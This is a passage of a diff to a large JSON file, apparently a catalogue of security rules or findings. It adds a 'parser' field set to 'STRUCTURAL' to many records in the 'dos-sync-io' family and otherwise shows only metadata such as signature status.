15515
15675
  "_passThroughSigning": false,
15516
15676
  "signatureStatus": "verified",
@@ -15740,6 +15900,7 @@
15740
15900
  "unvalidated": true,
15741
15901
  "cross_language": false,
15742
15902
  "family": "dos-sync-io",
15903
+ "parser": "STRUCTURAL",
15743
15904
  "_unsigned": false,
15744
15905
  "_passThroughSigning": false,
15745
15906
  "signatureStatus": "verified",
@@ -15969,6 +16130,7 @@
15969
16130
  "unvalidated": true,
15970
16131
  "cross_language": false,
15971
16132
  "family": "dos-sync-io",
16133
+ "parser": "STRUCTURAL",
15972
16134
  "_unsigned": false,
15973
16135
  "_passThroughSigning": false,
15974
16136
  "signatureStatus": "verified",
@@ -16198,6 +16360,7 @@
16198
16360
  "unvalidated": true,
16199
16361
  "cross_language": false,
16200
16362
  "family": "dos-sync-io",
16363
+ "parser": "STRUCTURAL",
16201
16364
  "_unsigned": false,
16202
16365
  "_passThroughSigning": false,
16203
16366
  "signatureStatus": "verified",
@@ -16427,6 +16590,7 @@
16427
16590
  "unvalidated": true,
16428
16591
  "cross_language": false,
16429
16592
  "family": "dos-sync-io",
16593
+ "parser": "STRUCTURAL",
16430
16594
  "_unsigned": false,
16431
16595
  "_passThroughSigning": false,
16432
16596
  "signatureStatus": "verified",
@@ -16656,6 +16820,7 @@
16656
16820
  "unvalidated": true,
16657
16821
  "cross_language": false,
16658
16822
  "family": "dos-sync-io",
16823
+ "parser": "STRUCTURAL",
16659
16824
  "_unsigned": false,
16660
16825
  "_passThroughSigning": false,
16661
16826
  "signatureStatus": "verified",
@@ -16885,6 +17050,7 @@
16885
17050
  "unvalidated": true,
16886
17051
  "cross_language": false,
16887
17052
  "family": "dos-sync-io",
17053
+ "parser": "STRUCTURAL",
16888
17054
  "_unsigned": false,
16889
17055
  "_passThroughSigning": false,
16890
17056
  "signatureStatus": "verified",
@@ -17114,6 +17280,7 @@
17114
17280
  "unvalidated": true,
17115
17281
  "cross_language": false,
17116
17282
  "family": "dos-sync-io",
17283
+ "parser": "STRUCTURAL",
17117
17284
  "_unsigned": false,
17118
17285
  "_passThroughSigning": false,
17119
17286
  "signatureStatus": "verified",
@@ -17343,6 +17510,7 @@
17343
17510
  "unvalidated": true,
17344
17511
  "cross_language": false,
17345
17512
  "family": "dos-sync-io",
17513
+ "parser": "STRUCTURAL",
17346
17514
  "_unsigned": false,
17347
17515
  "_passThroughSigning": false,
17348
17516
  "signatureStatus": "verified",
@@ -17572,6 +17740,7 @@
17572
17740
  "unvalidated": true,
17573
17741
  "cross_language": false,
17574
17742
  "family": "dos-sync-io",
17743
+ "parser": "STRUCTURAL",
17575
17744
  "_unsigned": false,
17576
17745
  "_passThroughSigning": false,
17577
17746
  "signatureStatus": "verified",
@@ -17801,6 +17970,7 @@
17801
17970
  "unvalidated": true,
17802
17971
  "cross_language": false,
17803
17972
  "family": "dos-sync-io",
17973
+ "parser": "STRUCTURAL",
17804
17974
  "_unsigned": false,
17805
17975
  "_passThroughSigning": false,
17806
17976
  "signatureStatus": "verified",
@@ -18030,6 +18200,7 @@
18030
18200
  "unvalidated": true,
18031
18201
  "cross_language": false,
18032
18202
  "family": "dos-sync-io",
18203
+ "parser": "STRUCTURAL",
18033
18204
  "_unsigned": false,
18034
18205
  "_passThroughSigning": false,
18035
18206
  "signatureStatus": "verified",
@@ -18259,6 +18430,7 @@
18259
18430
  "unvalidated": true,
18260
18431
  "cross_language": false,
18261
18432
  "family": "dos-sync-io",
18433
+ "parser": "STRUCTURAL",
18262
18434
  "_unsigned": false,
18263
18435
  "_passThroughSigning": false,
18264
18436
  "signatureStatus": "verified",
@@ -18490,6 +18662,7 @@
18490
18662
  "unvalidated": true,
18491
18663
  "cross_language": false,
18492
18664
  "family": "dos-sync-io",
18665
+ "parser": "STRUCTURAL",
18493
18666
  "_unsigned": false,
18494
18667
  "_passThroughSigning": false,
18495
18668
  "signatureStatus": "verified",
@@ -18721,6 +18894,7 @@
18721
18894
  "unvalidated": true,
18722
18895
  "cross_language": false,
18723
18896
  "family": "dos-sync-io",
18897
+ "parser": "STRUCTURAL",
18724
18898
  "_unsigned": false,
18725
18899
  "_passThroughSigning": false,
18726
18900
  "signatureStatus": "verified",
@@ -18950,6 +19124,7 @@
18950
19124
  "unvalidated": true,
18951
19125
  "cross_language": false,
18952
19126
  "family": "dos-sync-io",
19127
+ "parser": "STRUCTURAL",
18953
19128
  "_unsigned": false,
18954
19129
  "_passThroughSigning": false,
18955
19130
  "signatureStatus": "verified",
@@ -19179,6 +19354,7 @@
19179
19354
  "unvalidated": true,
19180
19355
  "cross_language": false,
19181
19356
  "family": "dos-sync-io",
19357
+ "parser": "STRUCTURAL",
19182
19358
  "_unsigned": false,
19183
19359
  "_passThroughSigning": false,
19184
19360
  "signatureStatus": "verified",
@@ -19408,6 +19584,7 @@
19408
19584
  "unvalidated": true,
19409
19585
  "cross_language": false,
19410
19586
  "family": "dos-sync-io",
19587
+ "parser": "STRUCTURAL",
19411
19588
  "_unsigned": false,
19412
19589
  "_passThroughSigning": false,
19413
19590
  "signatureStatus": "verified",
@@ -19637,6 +19814,7 @@
19637
19814
  "unvalidated": true,
19638
19815
  "cross_language": false,
19639
19816
  "family": "dos-sync-io",
19817
+ "parser": "STRUCTURAL",
19640
19818
  "_unsigned": false,
19641
19819
  "_passThroughSigning": false,
19642
19820
  "signatureStatus": "verified",
@@ -19866,6 +20044,7 @@
19866
20044
  "unvalidated": true,
19867
20045
  "cross_language": false,
19868
20046
  "family": "dos-sync-io",
20047
+ "parser": "STRUCTURAL",
19869
20048
  "_unsigned": false,
19870
20049
  "_passThroughSigning": false,
19871
20050
  "signatureStatus": "verified",
@@ -20095,6 +20274,7 @@
20095
20274
  "unvalidated": true,
20096
20275
  "cross_language": false,
20097
20276
  "family": "dos-sync-io",
20277
+ "parser": "STRUCTURAL",
20098
20278
  "_unsigned": false,
20099
20279
  "_passThroughSigning": false,
20100
20280
  "signatureStatus": "verified",
@@ -20324,6 +20504,7 @@
20324
20504
  "unvalidated": true,
20325
20505
  "cross_language": false,
20326
20506
  "family": "dos-sync-io",
20507
+ "parser": "STRUCTURAL",
20327
20508
  "_unsigned": false,
20328
20509
  "_passThroughSigning": false,
20329
20510
  "signatureStatus": "verified",
@@ -20555,6 +20736,7 @@
20555
20736
  "unvalidated": true,
20556
20737
  "cross_language": false,
20557
20738
  "family": "dos-sync-io",
20739
+ "parser": "STRUCTURAL",
20558
20740
  "_unsigned": false,
20559
20741
  "_passThroughSigning": false,
20560
20742
  "signatureStatus": "verified",
@@ -20786,6 +20968,7 @@
20786
20968
  "unvalidated": true,
20787
20969
  "cross_language": false,
20788
20970
  "family": "dos-sync-io",
20971
+ "parser": "STRUCTURAL",
20789
20972
  "_unsigned": false,
20790
20973
  "_passThroughSigning": false,
20791
20974
  "signatureStatus": "verified",
@@ -21015,6 +21198,7 @@
21015
21198
  "unvalidated": true,
21016
21199
  "cross_language": false,
21017
21200
  "family": "dos-sync-io",
21201
+ "parser": "STRUCTURAL",
21018
21202
  "_unsigned": false,
21019
21203
  "_passThroughSigning": false,
21020
21204
  "signatureStatus": "verified",
@@ -21244,6 +21428,7 @@
21244
21428
  "unvalidated": true,
21245
21429
  "cross_language": false,
21246
21430
  "family": "dos-sync-io",
21431
+ "parser": "STRUCTURAL",
21247
21432
  "_unsigned": false,
21248
21433
  "_passThroughSigning": false,
21249
21434
  "signatureStatus": "verified",
@@ -21473,6 +21658,7 @@
21473
21658
  "unvalidated": true,
21474
21659
  "cross_language": false,
21475
21660
  "family": "dos-sync-io",
21661
+ "parser": "STRUCTURAL",
21476
21662
  "_unsigned": false,
21477
21663
  "_passThroughSigning": false,
21478
21664
  "signatureStatus": "verified",
@@ -21702,6 +21888,7 @@
21702
21888
  "unvalidated": true,
21703
21889
  "cross_language": false,
21704
21890
  "family": "dos-sync-io",
21891
+ "parser": "STRUCTURAL",
21705
21892
  "_unsigned": false,
21706
21893
  "_passThroughSigning": false,
21707
21894
  "signatureStatus": "verified",
@@ -21931,6 +22118,7 @@
21931
22118
  "unvalidated": true,
21932
22119
  "cross_language": false,
21933
22120
  "family": "dos-sync-io",
22121
+ "parser": "STRUCTURAL",
21934
22122
  "_unsigned": false,
21935
22123
  "_passThroughSigning": false,
21936
22124
  "signatureStatus": "verified",
@@ -22162,6 +22350,7 @@
22162
22350
  "unvalidated": true,
22163
22351
  "cross_language": false,
22164
22352
  "family": "dos-sync-io",
22353
+ "parser": "STRUCTURAL",
22165
22354
  "_unsigned": false,
22166
22355
  "_passThroughSigning": false,
22167
22356
  "signatureStatus": "verified",
@@ -22393,6 +22582,7 @@
22393
22582
  "unvalidated": true,
22394
22583
  "cross_language": false,
22395
22584
  "family": "dos-sync-io",
22585
+ "parser": "STRUCTURAL",
22396
22586
  "_unsigned": false,
22397
22587
  "_passThroughSigning": false,
22398
22588
  "signatureStatus": "verified",
@@ -22624,6 +22814,7 @@
22624
22814
  "unvalidated": true,
22625
22815
  "cross_language": false,
22626
22816
  "family": "dos-sync-io",
22817
+ "parser": "STRUCTURAL",
22627
22818
  "_unsigned": false,
22628
22819
  "_passThroughSigning": false,
22629
22820
  "signatureStatus": "verified",
@@ -22855,6 +23046,7 @@
22855
23046
  "unvalidated": true,
22856
23047
  "cross_language": false,
22857
23048
  "family": "dos-sync-io",
23049
+ "parser": "STRUCTURAL",
22858
23050
  "_unsigned": false,
22859
23051
  "_passThroughSigning": false,
22860
23052
  "signatureStatus": "verified",
@@ -23086,6 +23278,7 @@
23086
23278
  "unvalidated": true,
23087
23279
  "cross_language": false,
23088
23280
  "family": "dos-sync-io",
23281
+ "parser": "STRUCTURAL",
23089
23282
  "_unsigned": false,
23090
23283
  "_passThroughSigning": false,
23091
23284
  "signatureStatus": "verified",
@@ -23315,6 +23508,7 @@
23315
23508
  "unvalidated": true,
23316
23509
  "cross_language": false,
23317
23510
  "family": "dos-sync-io",
23511
+ "parser": "STRUCTURAL",
23318
23512
  "_unsigned": false,
23319
23513
  "_passThroughSigning": false,
23320
23514
  "signatureStatus": "verified",
@@ -23544,6 +23738,7 @@
23544
23738
  "unvalidated": true,
23545
23739
  "cross_language": false,
23546
23740
  "family": "dos-sync-io",
23741
+ "parser": "STRUCTURAL",
23547
23742
  "_unsigned": false,
23548
23743
  "_passThroughSigning": false,
23549
23744
  "signatureStatus": "verified",
@@ -23773,6 +23968,7 @@
23773
23968
  "unvalidated": true,
23774
23969
  "cross_language": false,
23775
23970
  "family": "dos-sync-io",
23971
+ "parser": "STRUCTURAL",
23776
23972
  "_unsigned": false,
23777
23973
  "_passThroughSigning": false,
23778
23974
  "signatureStatus": "verified",
@@ -24002,6 +24198,7 @@
24002
24198
  "unvalidated": true,
24003
24199
  "cross_language": false,
24004
24200
  "family": "dos-sync-io",
24201
+ "parser": "STRUCTURAL",
24005
24202
  "_unsigned": false,
24006
24203
  "_passThroughSigning": false,
24007
24204
  "signatureStatus": "verified",
@@ -24231,6 +24428,7 @@
24231
24428
  "unvalidated": true,
24232
24429
  "cross_language": false,
24233
24430
  "family": "dos-sync-io",
24431
+ "parser": "STRUCTURAL",
24234
24432
  "_unsigned": false,
24235
24433
  "_passThroughSigning": false,
24236
24434
  "signatureStatus": "verified",
@@ -24462,6 +24660,7 @@
24462
24660
  "unvalidated": true,
24463
24661
  "cross_language": false,
24464
24662
  "family": "dos-sync-io",
24663
+ "parser": "STRUCTURAL",
24465
24664
  "_unsigned": false,
24466
24665
  "_passThroughSigning": false,
24467
24666
  "signatureStatus": "verified",
@@ -24693,6 +24892,7 @@
24693
24892
  "unvalidated": true,
24694
24893
  "cross_language": false,
24695
24894
  "family": "dos-sync-io",
24895
+ "parser": "STRUCTURAL",
24696
24896
  "_unsigned": false,
24697
24897
  "_passThroughSigning": false,
24698
24898
  "signatureStatus": "verified",
@@ -24924,6 +25124,7 @@
24924
25124
  "unvalidated": true,
24925
25125
  "cross_language": false,
24926
25126
  "family": "dos-sync-io",
25127
+ "parser": "STRUCTURAL",
24927
25128
  "_unsigned": false,
24928
25129
  "_passThroughSigning": false,
24929
25130
  "signatureStatus": "verified",
@@ -25155,6 +25356,7 @@
25155
25356
  "unvalidated": true,
25156
25357
  "cross_language": false,
25157
25358
  "family": "dos-sync-io",
25359
+ "parser": "STRUCTURAL",
25158
25360
  "_unsigned": false,
25159
25361
  "_passThroughSigning": false,
25160
25362
  "signatureStatus": "verified",
@@ -25386,6 +25588,7 @@
25386
25588
  "unvalidated": true,
25387
25589
  "cross_language": false,
25388
25590
  "family": "dos-sync-io",
25591
+ "parser": "STRUCTURAL",
25389
25592
  "_unsigned": false,
25390
25593
  "_passThroughSigning": false,
25391
25594
  "signatureStatus": "verified",
@@ -25617,6 +25820,7 @@
25617
25820
  "unvalidated": true,
25618
25821
  "cross_language": false,
25619
25822
  "family": "dos-sync-io",
25823
+ "parser": "STRUCTURAL",
25620
25824
  "_unsigned": false,
25621
25825
  "_passThroughSigning": false,
25622
25826
  "signatureStatus": "verified",
@@ -25848,6 +26052,7 @@
25848
26052
  "unvalidated": true,
25849
26053
  "cross_language": false,
25850
26054
  "family": "dos-sync-io",
26055
+ "parser": "STRUCTURAL",
25851
26056
  "_unsigned": false,
25852
26057
  "_passThroughSigning": false,
25853
26058
  "signatureStatus": "verified",
@@ -26079,6 +26284,7 @@
26079
26284
  "unvalidated": true,
26080
26285
  "cross_language": false,
26081
26286
  "family": "dos-sync-io",
26287
+ "parser": "STRUCTURAL",
26082
26288
  "_unsigned": false,
26083
26289
  "_passThroughSigning": false,
26084
26290
  "signatureStatus": "verified",
@@ -26310,6 +26516,7 @@
26310
26516
  "unvalidated": true,
26311
26517
  "cross_language": false,
26312
26518
  "family": "dos-sync-io",
26519
+ "parser": "STRUCTURAL",
26313
26520
  "_unsigned": false,
26314
26521
  "_passThroughSigning": false,
26315
26522
  "signatureStatus": "verified",
@@ -26539,6 +26746,7 @@
26539
26746
  "unvalidated": true,
26540
26747
  "cross_language": false,
26541
26748
  "family": "dos-sync-io",
26749
+ "parser": "STRUCTURAL",
26542
26750
  "_unsigned": false,
26543
26751
  "_passThroughSigning": false,
26544
26752
  "signatureStatus": "verified",
@@ -26768,6 +26976,7 @@
26768
26976
  "unvalidated": true,
26769
26977
  "cross_language": false,
26770
26978
  "family": "dos-sync-io",
26979
+ "parser": "STRUCTURAL",
26771
26980
  "_unsigned": false,
26772
26981
  "_passThroughSigning": false,
26773
26982
  "signatureStatus": "verified",
@@ -26997,6 +27206,7 @@
26997
27206
  "unvalidated": true,
26998
27207
  "cross_language": false,
26999
27208
  "family": "dos-sync-io",
27209
+ "parser": "STRUCTURAL",
27000
27210
  "_unsigned": false,
27001
27211
  "_passThroughSigning": false,
27002
27212
  "signatureStatus": "verified",
@@ -27226,6 +27436,7 @@
27226
27436
  "unvalidated": true,
27227
27437
  "cross_language": false,
27228
27438
  "family": "dos-sync-io",
27439
+ "parser": "STRUCTURAL",
27229
27440
  "_unsigned": false,
27230
27441
  "_passThroughSigning": false,
27231
27442
  "signatureStatus": "verified",
@@ -27455,6 +27666,7 @@
27455
27666
  "unvalidated": true,
27456
27667
  "cross_language": false,
27457
27668
  "family": "dos-sync-io",
27669
+ "parser": "STRUCTURAL",
27458
27670
  "_unsigned": false,
27459
27671
  "_passThroughSigning": false,
27460
27672
  "signatureStatus": "verified",
@@ -27684,6 +27896,7 @@
27684
27896
  "unvalidated": true,
27685
27897
  "cross_language": false,
27686
27898
  "family": "dos-sync-io",
27899
+ "parser": "STRUCTURAL",
27687
27900
  "_unsigned": false,
27688
27901
  "_passThroughSigning": false,
27689
27902
  "signatureStatus": "verified",
@@ -27913,6 +28126,7 @@
27913
28126
  "unvalidated": true,
27914
28127
  "cross_language": false,
27915
28128
  "family": "dos-sync-io",
28129
+ "parser": "STRUCTURAL",
27916
28130
  "_unsigned": false,
27917
28131
  "_passThroughSigning": false,
27918
28132
  "signatureStatus": "verified",
@@ -28142,6 +28356,7 @@
28142
28356
  "unvalidated": true,
28143
28357
  "cross_language": false,
28144
28358
  "family": "dos-sync-io",
28359
+ "parser": "STRUCTURAL",
28145
28360
  "_unsigned": false,
28146
28361
  "_passThroughSigning": false,
28147
28362
  "signatureStatus": "verified",
@@ -28371,6 +28586,7 @@
28371
28586
  "unvalidated": true,
28372
28587
  "cross_language": false,
28373
28588
  "family": "dos-sync-io",
28589
+ "parser": "STRUCTURAL",
28374
28590
  "_unsigned": false,
28375
28591
  "_passThroughSigning": false,
28376
28592
  "signatureStatus": "verified",
@@ -28602,6 +28818,7 @@
28602
28818
  "unvalidated": true,
28603
28819
  "cross_language": false,
28604
28820
  "family": "dos-sync-io",
28821
+ "parser": "STRUCTURAL",
28605
28822
  "_unsigned": false,
28606
28823
  "_passThroughSigning": false,
28607
28824
  "signatureStatus": "verified",
@@ -28833,6 +29050,7 @@
28833
29050
  "unvalidated": true,
28834
29051
  "cross_language": false,
28835
29052
  "family": "dos-sync-io",
29053
+ "parser": "STRUCTURAL",
28836
29054
  "_unsigned": false,
28837
29055
  "_passThroughSigning": false,
28838
29056
  "signatureStatus": "verified",
@@ -29064,6 +29282,7 @@
29064
29282
  "unvalidated": true,
29065
29283
  "cross_language": false,
29066
29284
  "family": "dos-sync-io",
29285
+ "parser": "STRUCTURAL",
29067
29286
  "_unsigned": false,
29068
29287
  "_passThroughSigning": false,
29069
29288
  "signatureStatus": "verified",
@@ -29295,6 +29514,7 @@
29295
29514
  "unvalidated": true,
29296
29515
  "cross_language": false,
29297
29516
  "family": "dos-sync-io",
29517
+ "parser": "STRUCTURAL",
29298
29518
  "_unsigned": false,
29299
29519
  "_passThroughSigning": false,
29300
29520
  "signatureStatus": "verified",
@@ -29526,6 +29746,7 @@
29526
29746
  "unvalidated": true,
29527
29747
  "cross_language": false,
29528
29748
  "family": "dos-sync-io",
29749
+ "parser": "STRUCTURAL",
29529
29750
  "_unsigned": false,
29530
29751
  "_passThroughSigning": false,
29531
29752
  "signatureStatus": "verified",
@@ -29757,6 +29978,7 @@
29757
29978
  "unvalidated": true,
29758
29979
  "cross_language": false,
29759
29980
  "family": "dos-sync-io",
29981
+ "parser": "STRUCTURAL",
29760
29982
  "_unsigned": false,
29761
29983
  "_passThroughSigning": false,
29762
29984
  "signatureStatus": "verified",
@@ -29988,6 +30210,7 @@
29988
30210
  "unvalidated": true,
29989
30211
  "cross_language": false,
29990
30212
  "family": "dos-sync-io",
30213
+ "parser": "STRUCTURAL",
29991
30214
  "_unsigned": false,
29992
30215
  "_passThroughSigning": false,
29993
30216
  "signatureStatus": "verified",
@@ -30219,6 +30442,7 @@
30219
30442
  "unvalidated": true,
30220
30443
  "cross_language": false,
30221
30444
  "family": "dos-sync-io",
30445
+ "parser": "STRUCTURAL",
30222
30446
  "_unsigned": false,
30223
30447
  "_passThroughSigning": false,
30224
30448
  "signatureStatus": "verified",
@@ -30450,6 +30674,7 @@
30450
30674
  "unvalidated": true,
30451
30675
  "cross_language": false,
30452
30676
  "family": "dos-sync-io",
30677
+ "parser": "STRUCTURAL",
30453
30678
  "_unsigned": false,
30454
30679
  "_passThroughSigning": false,
30455
30680
  "signatureStatus": "verified",
@@ -30681,6 +30906,7 @@
30681
30906
  "unvalidated": true,
30682
30907
  "cross_language": false,
30683
30908
  "family": "dos-sync-io",
30909
+ "parser": "STRUCTURAL",
30684
30910
  "_unsigned": false,
30685
30911
  "_passThroughSigning": false,
30686
30912
  "signatureStatus": "verified",
@@ -30912,6 +31138,7 @@
30912
31138
  "unvalidated": true,
30913
31139
  "cross_language": false,
30914
31140
  "family": "dos-sync-io",
31141
+ "parser": "STRUCTURAL",
30915
31142
  "_unsigned": false,
30916
31143
  "_passThroughSigning": false,
30917
31144
  "signatureStatus": "verified",
@@ -31143,6 +31370,7 @@
31143
31370
  "unvalidated": true,
31144
31371
  "cross_language": false,
31145
31372
  "family": "dos-sync-io",
31373
+ "parser": "STRUCTURAL",
31146
31374
  "_unsigned": false,
31147
31375
  "_passThroughSigning": false,
31148
31376
  "signatureStatus": "verified",
@@ -31374,6 +31602,7 @@
31374
31602
  "unvalidated": true,
31375
31603
  "cross_language": false,
31376
31604
  "family": "dos-sync-io",
31605
+ "parser": "STRUCTURAL",
31377
31606
  "_unsigned": false,
31378
31607
  "_passThroughSigning": false,
31379
31608
  "signatureStatus": "verified",
@@ -31603,6 +31832,7 @@
31603
31832
  "unvalidated": true,
31604
31833
  "cross_language": false,
31605
31834
  "family": "dos-sync-io",
31835
+ "parser": "STRUCTURAL",
31606
31836
  "_unsigned": false,
31607
31837
  "_passThroughSigning": false,
31608
31838
  "signatureStatus": "verified",
@@ -31832,6 +32062,7 @@
31832
32062
  "unvalidated": true,
31833
32063
  "cross_language": false,
31834
32064
  "family": "dos-sync-io",
32065
+ "parser": "STRUCTURAL",
31835
32066
  "_unsigned": false,
31836
32067
  "_passThroughSigning": false,
31837
32068
  "signatureStatus": "verified",
@@ -32061,6 +32292,7 @@
32061
32292
  "unvalidated": true,
32062
32293
  "cross_language": false,
32063
32294
  "family": "dos-sync-io",
32295
+ "parser": "STRUCTURAL",
32064
32296
  "_unsigned": false,
32065
32297
  "_passThroughSigning": false,
32066
32298
  "signatureStatus": "verified",
@@ -32290,6 +32522,7 @@
32290
32522
  "unvalidated": true,
32291
32523
  "cross_language": false,
32292
32524
  "family": "dos-sync-io",
32525
+ "parser": "STRUCTURAL",
32293
32526
  "_unsigned": false,
32294
32527
  "_passThroughSigning": false,
32295
32528
  "signatureStatus": "verified",
@@ -32519,6 +32752,7 @@
32519
32752
  "unvalidated": true,
32520
32753
  "cross_language": false,
32521
32754
  "family": "dos-sync-io",
32755
+ "parser": "STRUCTURAL",
32522
32756
  "_unsigned": false,
32523
32757
  "_passThroughSigning": false,
32524
32758
  "signatureStatus": "verified",
@@ -32748,6 +32982,7 @@
32748
32982
  "unvalidated": true,
32749
32983
  "cross_language": false,
32750
32984
  "family": "dos-sync-io",
32985
+ "parser": "STRUCTURAL",
32751
32986
  "_unsigned": false,
32752
32987
  "_passThroughSigning": false,
32753
32988
  "signatureStatus": "verified",
@@ -32977,6 +33212,7 @@
32977
33212
  "unvalidated": true,
32978
33213
  "cross_language": false,
32979
33214
  "family": "dos-sync-io",
33215
+ "parser": "STRUCTURAL",
32980
33216
  "_unsigned": false,
32981
33217
  "_passThroughSigning": false,
32982
33218
  "signatureStatus": "verified",
@@ -33206,6 +33442,7 @@
33206
33442
  "unvalidated": true,
33207
33443
  "cross_language": false,
33208
33444
  "family": "dos-sync-io",
33445
+ "parser": "STRUCTURAL",
33209
33446
  "_unsigned": false,
33210
33447
  "_passThroughSigning": false,
33211
33448
  "signatureStatus": "verified",
@@ -33435,6 +33672,7 @@
33435
33672
  "unvalidated": true,
33436
33673
  "cross_language": false,
33437
33674
  "family": "dos-sync-io",
33675
+ "parser": "STRUCTURAL",
33438
33676
  "_unsigned": false,
33439
33677
  "_passThroughSigning": false,
33440
33678
  "signatureStatus": "verified",
@@ -33664,6 +33902,7 @@
33664
33902
  "unvalidated": true,
33665
33903
  "cross_language": false,
33666
33904
  "family": "dos-sync-io",
33905
+ "parser": "STRUCTURAL",
33667
33906
  "_unsigned": false,
33668
33907
  "_passThroughSigning": false,
33669
33908
  "signatureStatus": "verified",
@@ -33893,6 +34132,7 @@
33893
34132
  "unvalidated": true,
33894
34133
  "cross_language": false,
33895
34134
  "family": "dos-sync-io",
34135
+ "parser": "STRUCTURAL",
33896
34136
  "_unsigned": false,
33897
34137
  "_passThroughSigning": false,
33898
34138
  "signatureStatus": "verified",
@@ -34122,6 +34362,7 @@
34122
34362
  "unvalidated": true,
34123
34363
  "cross_language": false,
34124
34364
  "family": "dos-sync-io",
34365
+ "parser": "STRUCTURAL",
34125
34366
  "_unsigned": false,
34126
34367
  "_passThroughSigning": false,
34127
34368
  "signatureStatus": "verified",
@@ -34351,6 +34592,7 @@
34351
34592
  "unvalidated": true,
34352
34593
  "cross_language": false,
34353
34594
  "family": "dos-sync-io",
34595
+ "parser": "STRUCTURAL",
34354
34596
  "_unsigned": false,
34355
34597
  "_passThroughSigning": false,
34356
34598
  "signatureStatus": "verified",
@@ -34580,6 +34822,7 @@
34580
34822
  "unvalidated": true,
34581
34823
  "cross_language": false,
34582
34824
  "family": "dos-sync-io",
34825
+ "parser": "STRUCTURAL",
34583
34826
  "_unsigned": false,
34584
34827
  "_passThroughSigning": false,
34585
34828
  "signatureStatus": "verified",
@@ -34809,6 +35052,7 @@
34809
35052
  "unvalidated": true,
34810
35053
  "cross_language": false,
34811
35054
  "family": "dos-sync-io",
35055
+ "parser": "STRUCTURAL",
34812
35056
  "_unsigned": false,
34813
35057
  "_passThroughSigning": false,
34814
35058
  "signatureStatus": "verified",
@@ -35040,6 +35284,7 @@
35040
35284
  "unvalidated": true,
35041
35285
  "cross_language": false,
35042
35286
  "family": "dos-sync-io",
35287
+ "parser": "STRUCTURAL",
35043
35288
  "_unsigned": false,
35044
35289
  "_passThroughSigning": false,
35045
35290
  "signatureStatus": "verified",
@@ -35271,6 +35516,7 @@
35271
35516
  "unvalidated": true,
35272
35517
  "cross_language": false,
35273
35518
  "family": "dos-sync-io",
35519
+ "parser": "STRUCTURAL",
35274
35520
  "_unsigned": false,
35275
35521
  "_passThroughSigning": false,
35276
35522
  "signatureStatus": "verified",
@@ -35500,6 +35746,7 @@
35500
35746
  "unvalidated": true,
35501
35747
  "cross_language": false,
35502
35748
  "family": "dos-sync-io",
35749
+ "parser": "STRUCTURAL",
35503
35750
  "_unsigned": false,
35504
35751
  "_passThroughSigning": false,
35505
35752
  "signatureStatus": "verified",
@@ -35729,6 +35976,7 @@
35729
35976
  "unvalidated": true,
35730
35977
  "cross_language": false,
35731
35978
  "family": "dos-sync-io",
35979
+ "parser": "STRUCTURAL",
35732
35980
  "_unsigned": false,
35733
35981
  "_passThroughSigning": false,
35734
35982
  "signatureStatus": "verified",
@@ -35958,6 +36206,7 @@
35958
36206
  "unvalidated": true,
35959
36207
  "cross_language": false,
35960
36208
  "family": "dos-sync-io",
36209
+ "parser": "STRUCTURAL",
35961
36210
  "_unsigned": false,
35962
36211
  "_passThroughSigning": false,
35963
36212
  "signatureStatus": "verified",
@@ -36187,6 +36436,7 @@
36187
36436
  "unvalidated": true,
36188
36437
  "cross_language": false,
36189
36438
  "family": "dos-sync-io",
36439
+ "parser": "STRUCTURAL",
36190
36440
  "_unsigned": false,
36191
36441
  "_passThroughSigning": false,
36192
36442
  "signatureStatus": "verified",
@@ -36416,6 +36666,7 @@
36416
36666
  "unvalidated": true,
36417
36667
  "cross_language": false,
36418
36668
  "family": "dos-sync-io",
36669
+ "parser": "STRUCTURAL",
36419
36670
  "_unsigned": false,
36420
36671
  "_passThroughSigning": false,
36421
36672
  "signatureStatus": "verified",
@@ -36645,6 +36896,7 @@
36645
36896
  "unvalidated": true,
36646
36897
  "cross_language": false,
36647
36898
  "family": "dos-sync-io",
36899
+ "parser": "STRUCTURAL",
36648
36900
  "_unsigned": false,
36649
36901
  "_passThroughSigning": false,
36650
36902
  "signatureStatus": "verified",
@@ -36876,6 +37128,7 @@
36876
37128
  "unvalidated": true,
36877
37129
  "cross_language": false,
36878
37130
  "family": "dos-sync-io",
37131
+ "parser": "STRUCTURAL",
36879
37132
  "_unsigned": false,
36880
37133
  "_passThroughSigning": false,
36881
37134
  "signatureStatus": "verified",
@@ -37105,6 +37358,7 @@
37105
37358
  "unvalidated": true,
37106
37359
  "cross_language": false,
37107
37360
  "family": "dos-sync-io",
37361
+ "parser": "STRUCTURAL",
37108
37362
  "_unsigned": false,
37109
37363
  "_passThroughSigning": false,
37110
37364
  "signatureStatus": "verified",
@@ -37334,6 +37588,7 @@
37334
37588
  "unvalidated": true,
37335
37589
  "cross_language": false,
37336
37590
  "family": "dos-sync-io",
37591
+ "parser": "STRUCTURAL",
37337
37592
  "_unsigned": false,
37338
37593
  "_passThroughSigning": false,
37339
37594
  "signatureStatus": "verified",
@@ -37565,6 +37820,7 @@
37565
37820
  "unvalidated": true,
37566
37821
  "cross_language": false,
37567
37822
  "family": "dos-sync-io",
37823
+ "parser": "STRUCTURAL",
37568
37824
  "_unsigned": false,
37569
37825
  "_passThroughSigning": false,
37570
37826
  "signatureStatus": "verified",
@@ -37794,6 +38050,7 @@
37794
38050
  "unvalidated": true,
37795
38051
  "cross_language": false,
37796
38052
  "family": "dos-sync-io",
38053
+ "parser": "STRUCTURAL",
37797
38054
  "_unsigned": false,
37798
38055
  "_passThroughSigning": false,
37799
38056
  "signatureStatus": "verified",
@@ -38023,6 +38280,7 @@
38023
38280
  "unvalidated": true,
38024
38281
  "cross_language": false,
38025
38282
  "family": "dos-sync-io",
38283
+ "parser": "STRUCTURAL",
38026
38284
  "_unsigned": false,
38027
38285
  "_passThroughSigning": false,
38028
38286
  "signatureStatus": "verified",
@@ -38254,6 +38512,7 @@
38254
38512
  "unvalidated": true,
38255
38513
  "cross_language": false,
38256
38514
  "family": "dos-sync-io",
38515
+ "parser": "STRUCTURAL",
38257
38516
  "_unsigned": false,
38258
38517
  "_passThroughSigning": false,
38259
38518
  "signatureStatus": "verified",
@@ -38486,6 +38745,7 @@
38486
38745
  "unvalidated": true,
38487
38746
  "cross_language": false,
38488
38747
  "family": "dos-sync-io",
38748
+ "parser": "STRUCTURAL",
38489
38749
  "_unsigned": false,
38490
38750
  "_passThroughSigning": false,
38491
38751
  "signatureStatus": "verified",
@@ -38723,6 +38983,7 @@
38723
38983
  "unvalidated": true,
38724
38984
  "cross_language": false,
38725
38985
  "family": "dos-sync-io",
38986
+ "parser": "STRUCTURAL",
38726
38987
  "_unsigned": false,
38727
38988
  "_passThroughSigning": false,
38728
38989
  "signatureStatus": "verified",
